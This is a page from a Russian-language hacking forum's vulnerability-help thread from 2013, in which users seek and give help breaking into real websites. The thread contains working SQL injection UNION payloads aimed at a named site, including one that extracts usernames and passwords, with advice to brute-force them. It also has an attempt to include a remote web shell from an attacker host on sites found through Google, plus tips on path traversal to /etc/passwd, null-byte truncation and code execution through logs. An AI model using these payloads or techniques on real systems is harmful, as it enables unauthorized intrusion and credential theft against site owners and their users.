FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2264 из 2422

2264

Опции темы

Поиск в этой теме

Опции просмотра

06.11.2013, 00:14

Soliariss

Guest

Сообщений: n/a

Провел на форуме:
344

Репутация: 0

Есть сайт с самописной cms, крутится на php 5.3.15, nginx 1.0.5.

url'ы вида site.com/lang/site/news/id/33/ ,GET-запросы фильтруються...

С какой стороны можно подступиться к аудиту Думаю, для начала просканировать порты nmap. Что подскажут гуру?!

06.11.2013, 10:53

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от Br@!ns

Br@!ns said:
http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=88
Изменяя последнее число получаются разные ошибки, типа
http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=115
можно попробовать как то покрутить? или вообще в каком направлении идти?

Ошибки вылезают из-за неправилной кодировки.

Для первого случая, âåêî - веко (CP1252 ---> CP1251). Крутить не получится.

07.11.2013, 11:01

jassoctov

Guest

Сообщений: n/a

Провел на форуме:
699

Репутация: 0

Можно ли это как то раскрутить, и в каком направлении думатью

Движок DLE

Запрос http://******.**/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999/

07.11.2013, 12:31

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

выводит

Цитата:

Сообщение от None

http://www.ab99.ru/services/service10'+union+select+1,2,3,4,version(),6,7,8,9, 10,11,12,13,14+--+

Цитата:

Сообщение от None

http://www.ab99.ru/services/service10'+union+select+1,2,3,4,version(),6,7,8,9, 10,11,12,13,14+frOm+information_schema+--+

дальше что то неполучается, information_schema почему то тоже нет, разве в 5 Mysql он необязателен? Помогите)

07.11.2013, 13:02

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от Br@!ns

Br@!ns said:
выводит
дальше что то неполучается, information_schema почему то тоже нет, разве в 5 Mysql он необязателен? Помогите)

Цитата:

Сообщение от None

www.ab99.ru/services/service10'+union select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8 ,9, 10,11,12,13,14 From users+--+

Брут никто не отменял

07.11.2013, 13:24

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Цитата:

Сообщение от Br@!ns

Br@!ns said:
дальше что то неполучается, information_schema почему то тоже нет, разве в 5 Mysql он необязателен? Помогите)

information_schema существует, просто доступа к ней нет у того пользователя от которого делаются запросы.

08.11.2013, 22:17

SunHere

Guest

Сообщений: n/a

Провел на форуме:
552

Репутация: 0

Добрый день, есть локальный инклуд вида""Warning: include(inc/123.php) [function.include]: failed to open stream: No such file or directory in"

когда я в переменную вставляю http://evilsite.ru/wso2.php, то на странице выводится ошибка:"Warning: include(inc/http://evilsite.ru/wso2.php)", вопрос как обрезать добавление префикса "inc/" ?

p.s интересует тема тестирования безопасности сайта, выбрал несколько сайтов в гугле, которые выводят такое сообщения и хочу попробовать добиться использования этой уязвимости для более глубокого понимания.

08.11.2013, 22:21

Unknown

Guest

Сообщений: n/a

Провел на форуме:
16399

Репутация: 10

Никак, локальный инклуд и есть локальный инклуд. Пробуй загрузить файл со своим php кодом на сайт и инклудь его.

08.11.2013, 23:17

Inoms

Guest

Сообщений: n/a

Провел на форуме:
23349

Репутация: 45

Цитата:

Сообщение от SunHere

SunHere said:
Добрый день, есть локальный инклуд вида""Warning: include(inc/123.php) [function.include]: failed to open stream: No such file or directory in"
когда я в переменную вставляю http://evilsite.ru/wso2.php, то на странице выводится ошибка:"Warning: include(inc/http://evilsite.ru/wso2.php)", вопрос как обрезать добавление префикса "
inc/
" ?
p.s интересует тема тестирования безопасности сайта, выбрал несколько сайтов в гугле, которые выводят такое сообщения и хочу попробовать добиться использования этой уязвимости для более глубокого понимания.

Его ничем нельзя отрезать ибо он заранее указан как префикс, можно подключить локальный файл, например ../../../../../../etc/passwd (если Unix), почитать логи, выполнить через них код и т.д

#10

09.11.2013, 19:48

SunHere

Guest

Сообщений: n/a

Провел на форуме:
552

Репутация: 0

Цитата:

Сообщение от Inoms

Inoms said:
Его ничем нельзя отрезать ибо он заранее указан как префикс, можно подключить локальный файл, например ../../../../../../etc/passwd (если Unix), почитать логи, выполнить через них код и т.д

Окей, я начал пробовать подключить этот файл, но выводится следующее сообщение

Код HTML:

HTML:
Warning: include(inc/../../../../../../../etc/passwd.php)

Когда же добавляю ../../../../../../etc/passwd%00, то вместо ошибки на сайте выводится стандартная страница, как будто без параметров отправился запрос. Какие тут возможные действия дальше?

Страница 2264 из 2422

2264

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход

ANTICHAT.XYZ